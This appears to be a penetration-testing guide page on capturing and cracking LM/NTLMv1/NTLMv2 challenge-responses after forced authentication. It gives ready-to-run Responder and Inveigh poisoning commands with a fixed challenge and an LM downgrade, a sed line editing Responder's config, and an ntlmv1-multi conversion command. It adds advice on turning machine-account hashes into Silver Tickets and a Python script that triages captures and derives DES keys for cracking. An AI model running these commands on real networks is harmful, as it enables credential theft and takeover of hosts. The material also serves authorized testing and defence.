Capture

Theory

After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the response sent by the victim (commonly called an LM, NTLMv1 or NTLMv2 "hash"). That response is a challenge-response value computed from the user's hash and the server's challenge, not the NT hash itself: it cannot be passed-the-hash or replayed as-is, it has to be cracked.

Practice

NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features: those tools can be combined with others offering different "authentication forcing" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).
Responder (Python) and Inveigh (PowerShell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers (SMB, HTTP, and others) waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.
In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788. This only matters for LM and NTLMv1 responses: with a known, fixed server challenge, the DES-based response can be looked up in precomputed tables (crack.sh) instead of being brute-forced. NTLMv2 responses also mix in a client challenge and a timestamp, so a fixed server challenge does not make them any easier to crack.
For Inveigh, the challenge is set with the -Challenge command-line argument. For Responder, testers need to edit the configuration file, where the Challenge setting is Random by default.
sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf
Responder
Inveigh
Start poisoning LLMNR, NBT-NS and mDNS, enable answers for NetBIOS wredir and domain suffix queries, enable WPAD, and try to force an LM hashing downgrade (this asks the client to use the weakest authentication protocol it accepts; it only succeeds against clients whose LM compatibility level still allows LM or NTLMv1 responses). Option names vary between Responder versions, so check responder -h before running.
responder --interface eth0 --wredir --NBTNSdomain --wpad --lm
Testers should always try to force an LM hashing downgrade with Responder (--lm option). LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh: a NTLMv1 response is three DES encryptions of the server challenge under keys cut from the NT hash, so with the fixed challenge 1122334455667788 the work is a table lookup, and what gets recovered is the NT hash itself (which is enough for pass-the-hash, even if the password is never found). The ntlmv1-multi tool (Python) can be used to convert captured responses to formats crackable by hashcat, crack.sh and so on, including the ESS/SSP case where the challenge actually used by DES has to be derived from the server and client challenges first.
ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
When the captured response comes from a machine account (name ending with $, like SV01$ above), cracking it yields that machine's NT hash, which can be used with the Silver Ticket technique to forge service tickets for that host and gain admin access to it.
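The triage below is an added example and is not code from Responder, Inveigh or ntlmv1-multi. It takes a captured NetNTLMv1 line in the layout Responder logs (user::domain:LM_response:NT_response:server_challenge, the hashcat -m 5500 layout), detects the ESS/SSP variant (an LM field made of an 8-byte client nonce followed by 16 zero bytes, which is an assumption about how the capture looks), computes the challenge that DES actually encrypted, and reports whether the fixed-challenge tables apply. It also shows how the three DES keys are cut from an NT hash, which is why the third key only carries two unknown bytes. The machine-account line is the one from the page; the ESS line, the user name jdoe and the NT hash of the password "password" are constructed sample data.

```python
"""NetNTLMv1 capture triage (added example, hypothetical helper names)."""
import hashlib

STANDARD_CHALLENGE = "1122334455667788"

# Sample from the page (machine account, no ESS: LM and NT responses are identical).
SAMPLE_STANDARD = ("SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5"
                   ":AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788")
# Constructed ESS sample: LM field = client nonce (8 bytes) + 16 zero bytes.
SAMPLE_ESS = ("jdoe::BREAKING.BAD:aabbccddeeff0011" + "0" * 32
              + ":" + "0123456789abcdef" * 3 + ":1122334455667788")


def parse_netntlmv1(line):
    """Split a Responder/hashcat 5500 line into its fields (hex kept lowercase)."""
    user, _, domain, lm_resp, nt_resp, challenge = line.strip().split(":")
    if len(lm_resp) != 48 or len(nt_resp) != 48 or len(challenge) != 16:
        raise ValueError("not NetNTLMv1: responses must be 24 bytes, challenge 8 bytes")
    return {"user": user, "domain": domain, "lm": lm_resp.lower(),
            "nt": nt_resp.lower(), "challenge": challenge.lower()}


def is_ess(capture):
    """Extended Session Security: LM field = 8-byte client nonce + 16 zero bytes."""
    return capture["lm"][16:] == "0" * 32


def effective_challenge(capture):
    """Challenge fed to DES. With ESS it is MD5(server_challenge || client_nonce)[:8]."""
    if not is_ess(capture):
        return capture["challenge"]
    server = bytes.fromhex(capture["challenge"])
    client = bytes.fromhex(capture["lm"][:16])
    return hashlib.md5(server + client).digest()[:8].hex()


def rainbow_table_applies(capture):
    """Precomputed tables only cover the fixed challenge, so ESS captures never qualify."""
    return effective_challenge(capture) == STANDARD_CHALLENGE


def split_des_blocks(capture):
    """NT response = DES_K1(C) || DES_K2(C) || DES_K3(C), 8 bytes each."""
    nt = capture["nt"]
    return [nt[0:16], nt[16:32], nt[32:48]]


def expand_des_key(key7):
    """Turn 7 key bytes into an 8-byte DES key with odd parity in the low bit."""
    k = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        seven = (k >> (49 - 7 * i)) & 0x7F   # next 7 bits, most significant first
        b = seven << 1
        if bin(b).count("1") % 2 == 0:       # make the byte's parity odd
            b |= 1
        out.append(b)
    return bytes(out)


def contract_des_key(key8):
    """Inverse of expand_des_key: drop the parity bits, giving the 7 key bytes back."""
    v = 0
    for b in key8:
        v = (v << 7) | (b >> 1)
    return v.to_bytes(7, "big")


def des_keys_from_nt_hash(nt_hash):
    """NTLMv1 pads the 16-byte NT hash with 5 zero bytes and cuts three 7-byte keys."""
    padded = nt_hash + b"\x00" * 5
    return [expand_des_key(padded[i:i + 7]) for i in (0, 7, 14)]


def k3_candidates():
    """K3 = nt_hash[14:16] + five zero bytes: only 16 unknown bits to brute-force."""
    return 2 ** 16


if __name__ == "__main__":
    for line in (SAMPLE_STANDARD, SAMPLE_ESS):
        cap = parse_netntlmv1(line)
        print(cap["user"], "ESS" if is_ess(cap) else "plain NTLMv1",
              "effective challenge", effective_challenge(cap),
              "table lookup:", rainbow_table_applies(cap), split_des_blocks(cap))
    # NT hash of "password", used only to show the key layout (constructed input).
    k1, k2, k3 = des_keys_from_nt_hash(bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c"))
    print("K3 raw bytes:", contract_des_key(k3).hex(), "candidates:", k3_candidates())
```

For a plain NTLMv1 capture with the standard challenge the tables can return K1 and K2 directly, and K3 is recovered by trying 65536 keys; the three contracted keys concatenated are the NT hash plus padding. For an ESS capture the effective challenge is per-session, so only a DES brute force (hashcat's NTLMv1 modes, or the ESS formats ntlmv1-multi emits) remains.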
Start poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, and enable proxy server authentication captures.
Invoke-Inveigh -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y